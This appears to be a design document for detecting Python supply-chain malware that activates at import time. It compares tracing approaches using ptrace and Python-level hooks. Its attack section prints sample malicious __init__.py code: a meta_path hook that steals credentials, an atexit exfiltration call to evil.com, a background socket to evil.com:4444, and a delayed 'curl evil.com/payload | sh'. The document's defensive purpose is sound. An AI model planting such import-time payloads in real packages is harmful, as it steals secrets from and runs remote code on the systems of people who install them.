# Import-Time Attestation Design

## The Problem
Install-time ptrace captures everything during `pip install`. But sophisticated
malware puts zero suspicious code in setup.py — the payload lives in `__init__.py`
and only triggers on `import`. Examples: event-stream (2018), Lazarus (2025-2026).

Our current attestation is blind to this entire class of attack.

## Approaches

### Option A: Two-Phase Entrypoint (simplest)
Modify the entrypoint to do BOTH install and import as separate traced commands:

```bash
# Phase 1: Install (current)
cilock run --step pip-install --trace -- pip install <package>

# Phase 2: Import (NEW)
cilock run --step pip-import --trace -- python3 -c "import <package>"
```

Two separate attestations. Cross-attestation policy compares them:
- New network connections on import that weren't during install = suspicious
- New file accesses on import = suspicious
- New processes spawned on import = suspicious

**Pros:** Simple to implement. Uses existing infrastructure.
**Cons:** Two attestation envelopes per package. Only catches top-level import.

### Option B: Custom Import Attestor (cleanest)
New Rookery attestor plugin that runs in PostProductRunType:

```go
type ImportAttestation struct {
    Package       string        `json:"package"`
    ImportSuccess bool          `json:"importSuccess"`
    ImportError   string        `json:"importError,omitempty"`
    Processes     []ProcessInfo `json:"processes,omitempty"`
    // Reuses ProcessInfo from commandrun — same structure
    // with openedfiles, network, fileOps, syscallEvents
}
```

The attestor:
1. Determines what package was installed (from pip-install attestor data)
2. Spawns `python3 -c "import <package>"` as a child process
3. Attaches ptrace to trace the import execution
4. Records all syscalls (file opens, network, subprocesses)
5. Returns the data as an attestation

**Pros:** Single attestation envelope. Clean integration. Same trace infrastructure.
**Cons:** Significant development effort. Need to extract ptrace logic into reusable lib.

### Option C: Extend pip-install Attestor (pragmatic)
Add import-time analysis to the existing pip-install attestor:

```go
type ImportAnalysis struct {
    Package         string   `json:"package"`
    ImportSuccess   bool     `json:"importSuccess"`
    ImportError     string   `json:"importError,omitempty"`
    FilesAccessed   []string `json:"filesAccessed,omitempty"`
    NetworkCalls    int      `json:"networkCalls"`
    SubprocessCalls int      `json:"subprocessCalls"`
    SuspiciousOps   []string `json:"suspiciousOps,omitempty"`
}
```

After install, run a Python script that:
1. Traces the import using Python's `sys.settrace` and `sys.setprofile`
2. Hooks `socket.socket`, `subprocess.Popen`, `os.system` at Python level
3. Monitors `sys.meta_path` changes, `codecs.register` calls
4. Records what happened during import

**Pros:** Python-level visibility (sees things ptrace can't like codec registration).
**Cons:** Can be evaded by C extensions. Not as comprehensive as ptrace.

### Option D: Hybrid (recommended)
Combine A and C:

1. **Phase 1:** `cilock run --trace -- pip install <package>` (install attestation)
2. **Phase 2:** `cilock run --trace -- python3 /pip-witness/import_tracer.py <package>` (import attestation)

Where `import_tracer.py` does:
```python
import sys
import importlib

# Hook at Python level BEFORE import
original_meta_path = list(sys.meta_path)
original_modules = set(sys.modules.keys())

# Import the package
try:
    mod = importlib.import_module(package_name)
    success = True
except Exception as e:
    success = False

# After import, check what changed
new_meta_path = [x for x in sys.meta_path if x not in original_meta_path]
new_modules = set(sys.modules.keys()) - original_modules

# Report findings
# (ptrace captures syscalls, this script captures Python-level changes)
```

The import runs inside ptrace (via cilock run), so we get BOTH:
- Syscall-level trace (network, files, processes)
- Python-level analysis (import hooks, codecs, atexit handlers)

## What Import-Time Attacks Look Like

### 1. sys.meta_path Hook
```python
# __init__.py
import sys
class EvilFinder:
    def find_module(self, name, path=None):
        # Intercept all future imports
        steal_credentials()
        return None
sys.meta_path.insert(0, EvilFinder())
```
**ptrace sees:** Nothing unusual (no syscalls beyond normal module loading)
**Python tracer sees:** sys.meta_path changed

### 2. atexit Handler
```python
# __init__.py
import atexit
def exfiltrate_on_exit():
    import urllib.request
    urllib.request.urlopen("https://evil.com/?" + steal_env())
atexit.register(exfiltrate_on_exit)
```
**ptrace sees:** Nothing at import time. Exfil happens when Python exits.
**Python tracer sees:** atexit.register called

### 3. Background Thread
```python
# __init__.py
import threading
def background_c2():
    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("evil.com", 4444))
    # ... RAT logic
t = threading.Thread(target=background_c2, daemon=True)
t.start()
```
**ptrace sees:** socket + connect to evil.com during import!
**Python tracer sees:** threading.Thread started

### 4. Delayed Activation
```python
# __init__.py
import time, os
if int(time.time()) > 1775000000:  # After April 2026
    os.system("curl evil.com/payload | sh")
```
**ptrace sees:** Nothing (if scanned before activation date)
**Python tracer sees:** time.time() call + conditional (hard to detect)

## Feasibility Assessment

| Approach | Effort | Coverage | Evasion Resistance |
|----------|--------|----------|-------------------|
| A: Two-phase entrypoint | Low (1 day) | Good for syscall-visible attacks | Low (C extensions can evade) |
| B: Custom attestor | High (1 week) | Best | Medium |
| C: Python-level hooks | Medium (2-3 days) | Best for Python attacks | Low (can be evaded) |
| D: Hybrid A+C | Medium (2-3 days) | Best overall | Medium |

## Recommendation

Start with **Option A** (two-phase entrypoint) — it's a one-line change to the
entrypoint and gives us immediate import-time visibility via ptrace. Then layer
on **Option C** (Python-level hooks) for the things ptrace can't see.

The entrypoint change:
```bash
# After pip install completes...
cilock run \
    --step pip-import \
    --trace \
    --signer-file-key-path /etc/pip-witness/signing-key.pem \
    --outfile /attestations/${STEP_NAME}-import.json \
    -- python3 -c "import ${PACKAGE_NAME}"
```
